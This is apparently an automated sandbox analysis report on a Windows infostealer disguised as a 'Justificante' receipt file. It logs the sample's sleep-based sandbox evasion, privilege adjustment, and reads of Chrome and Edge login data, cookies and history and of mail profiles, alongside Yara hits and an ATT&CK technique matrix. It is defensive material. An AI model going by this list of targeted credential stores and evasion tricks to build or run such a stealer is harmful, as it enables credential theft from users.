            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Window / User API: threadDelayed 1659
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Window / User API: threadDelayed 8150
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd1568.tmp\System.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep count: 37 > 30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep time: -34126476536362649s >= -30000s
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 3332 Thread sleep count: 1659 > 30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep time: -599875s >= -30000s
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 3332 Thread sleep count: 8150 > 30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep time: -599766s >= -30000s
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep time: -599657s >= -30000s
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024 Thread sleep count: 37 > 30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_0040646B FindFirstFileA,FindClose,4_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599875
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599766
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599657
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599532
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599422
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599313
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599188
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 599063
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 598938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Thread delayed: delay time: 598813
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Microsoft
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.00000000026D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.000000000272E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd4dbcb03dbc38<
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe API call chain: ExitProcess graph end node graph_0-4034
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe API call chain: ExitProcess graph end node graph_0-4200
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_6FC41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FC41A98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Process created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR
            Source: Yara match File source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Directory queried: number of queries: 1001
            Source: Yara match File source: 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR
            Source: Yara match File source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 12 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Access Token Manipulation | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 14 File and Directory Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 215 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement